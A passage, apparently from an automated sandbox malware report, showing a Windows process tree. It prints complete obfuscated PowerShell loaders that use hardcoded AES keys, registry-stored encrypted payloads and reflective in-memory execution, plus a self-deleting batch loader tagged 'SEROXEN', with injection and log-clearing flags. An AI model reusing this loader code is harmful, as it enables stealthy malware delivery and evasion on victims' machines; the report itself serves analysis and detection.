$RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Hide Artifacts: Hidden Window
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2656
    - - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{2fe032de-ab54-4cb1-9edf-fa8856ca6027}
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2992
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2656).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
        5⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3204
    - - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{712cfe24-71b0-4334-a10e-3818da35c53b}
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2072
    - - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{d2e8fd25-94fc-4467-a178-71c63d482411}
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5964
    - - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{2e4e3c33-3a48-4b2e-b5c3-b67a093182d3}
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5420
    - - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{86c31b53-4071-4d3f-b3df-39bdea9c266a}
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5156
    - - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{2cead3ed-2f85-4cfa-81a4-13d4c72b3eca}
        5⤵
        
        PID:2504
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 472
        6⤵
        Program crash
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6104
    - - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{58b78572-f955-4b05-9bd9-b76de2e56cf3}
        5⤵
        
        PID:6060
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 356
        6⤵
        Program crash
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5844

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1224

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1488
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2936

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1888

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2092

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2208

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2300

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2548

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2984

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3092

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5008
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3332
- - C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
    "Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Deletes itself
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:552
  - - C:\Windows\SysWOW64\dllhost.exe
      C:\Windows\SysWOW64\dllhost.exe /Processid:{12bfecfc-bdd5-4ae4-a983-2e067fa08bc0}
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1996
  - - C:\Windows\SysWOW64\dllhost.exe
      C:\Windows\SysWOW64\dllhost.exe /Processid:{25858422-c4c2-4908-9a08-2b4d7b932eda}
      4⤵
      PID:4984
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:5328
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2192
    - - C:\Windows\system32\PING.EXE
        
        PING localhost -n 8
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5696
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe"
        5⤵
        Kills process with taskkill
        
        PID:4648
    - - C:\Windows\system32\attrib.exe
        
        ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe"
        5⤵
        Views/modifies file attributes
        
        PID:5836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3476

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3848

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3996

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4296

C:\Windows\system32\DllHost.exe
